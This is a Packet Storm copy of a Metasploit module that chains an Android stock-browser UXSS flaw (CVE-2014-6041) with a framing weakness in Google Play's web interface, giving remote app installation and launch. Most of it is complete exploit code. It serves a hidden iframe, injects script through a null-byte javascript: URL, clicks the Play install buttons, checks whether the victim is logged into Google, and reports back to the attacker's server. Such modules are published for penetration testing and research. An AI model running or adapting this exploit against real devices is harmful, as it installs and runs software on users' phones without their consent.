This Metasploit module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, the module exploits CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in versions of Androids open source stock browser (the AOSP Browser) prior to 4.4. Second, the Google Play stores web interface fails to enforce a X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be targeted for script injection. As a result, this leads to remote code execution through Google Plays remote installation feature, as any application available on the Google Play store can be installed and launched on the users device. This Metasploit module requires that the user is logged into Google with a vulnerable browser. To list the activities in an APK, you can use aapt dump badging /path/to/app.apk.
328d1360b3bebdb1d86c00098a6491927d2bd65f1172897b674f5d8cc7695731##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Android Browser RCE Through Google Play Store XFO',
'Description' => %q{
This module combines two vulnerabilities to achieve remote code
execution on affected Android devices. First, the module exploits
CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in
versions of Android's open source stock browser (the AOSP Browser) prior to
4.4. Second, the Google Play store's web interface fails to enforce a
X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be
targeted for script injection. As a result, this leads to remote code execution
through Google Play's remote installation feature, as any application available
on the Google Play store can be installed and launched on the user's device.
This module requires that the user is logged into Google with a vulnerable browser.
To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.
},
'Author' => [
'Rafay Baloch', # Original UXSS vulnerability
'joev' # Play Store vector and Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'References' => [
[ 'URL', 'https://www.rapid7.com/blog/post/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/'],
[ 'URL', 'https://web.archive.org/web/20150316151817/http://1337day.com/exploit/description/22581' ],
[ 'OSVDB', '110664' ],
[ 'CVE', '2014-6041' ]
],
'DefaultAction' => 'WebServer'
))
register_options([
OptString.new('PACKAGE_NAME', [
true,
'The package name of the app on the Google Play store you want to install',
'com.swlkr.rickrolld'
]),
OptString.new('ACTIVITY_NAME', [
true,
'The name of the activity in the apk to launch',
'com.swlkr.rickrolld/.RickRoll'
]),
OptBool.new('DETECT_LOGIN', [
true, "Prevents the exploit from running if the user is not logged into Google", true
]),
OptBool.new('HIDE_IFRAME', [
true, "Hide the exploit iframe from the user", true
])
])
end
def on_request_uri(cli, request)
print_status("Request '#{request.method} #{request.uri}'")
if request.method.downcase == 'post'
print_error request.body[0..400]
send_response_html(cli, '')
else
print_status("Sending initial HTML ...")
send_response_html(cli, exploit_html)
end
end
def exploit_html
<<-EOS
<html>
<body>
<script>
var APP_ID = '#{datastore['PACKAGE_NAME']}';
var MAIN_ACTIVITY = '#{datastore['ACTIVITY_NAME']}';
var HIDDEN_STYLE = '#{hidden_css}';
function exploit() {
var src = 'https://play.google.com/store/apps/'+(new Array(2000)).join('aaaaaaa');
var frame = document.createElement('iframe');
frame.setAttribute('src', src);
frame.setAttribute('name', 'f');
frame.setAttribute('style', HIDDEN_STYLE);
function uxss(src) {
window.open('\\u0000javascript:eval(atob("'+ btoa(src) +'"))', 'f');
}
var loaded = false;
frame.onload = function() {
if (loaded) return;
loaded = true;
setTimeout(function(){
uxss('history.replaceState({},{},"/"); x=new XMLHttpRequest;x.open("GET", "/store/apps/details?id='+APP_ID+'");x.onreadystatechange=function(){'+
'if(x.readyState==4){ document.open("text/html"); document.write(x.responseText); document.close(); top.postMessage("1", "*") }};x.send();');
}, 100);
};
var i1, i2;
var w = window;
window.onmessage = function(event) {
if (event.data === '1') {
i1 = w.setInterval(function(){
uxss('document.body.innerHTML.match(/This app is compatible/).length; document.querySelector("button.price").click(); top.postMessage("2", "*");');
}, 500);
} else if (event.data === '2') {
w.clearInterval(i1);
i2 = setInterval(function(){2
uxss('document.querySelector("button.play-button.apps.loonie-ok-button").click(); top.postMessage("3", "*");');
}, 500);
} else if (event.data === '3') {
clearInterval(i2);
setTimeout(function(){
setInterval(function(){
frame.src = 'intent:launch#Intent;SEL;component='+MAIN_ACTIVITY+';end';
}, 500);
}, 1000);
}
}
document.body.appendChild(frame);
}
#{detect_login_js}
</script>
</body>
</html>
EOS
end
def detect_login_js
if datastore['DETECT_LOGIN']
%Q|
var img = document.createElement('img');
img.onload = exploit;
img.onerror = function() {
var url = '#{backend_url}';
var x = new XMLHttpRequest();
x.open('POST', url);
x.send('Exploit failed: user is not logged into google.com')
};
img.setAttribute('style', HIDDEN_STYLE);
var rand = '&d=#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';
img.setAttribute('src', 'https://accounts.google.com/CheckCookie?continue=https%3A%2F%2Fwww.google.com%2Fintl%2Fen%2Fimages%2Flogos%2Faccounts_logo.png'+rand);
document.body.appendChild(img);
|
else
'exploit();'
end
end
def hidden_css
if datastore['HIDE_IFRAME']
'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px;visibility:hidden;'
else
''
end
end
def backend_url
proto = (datastore["SSL"] ? "https" : "http")
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
"#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
end
def run
exploit
end
end
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed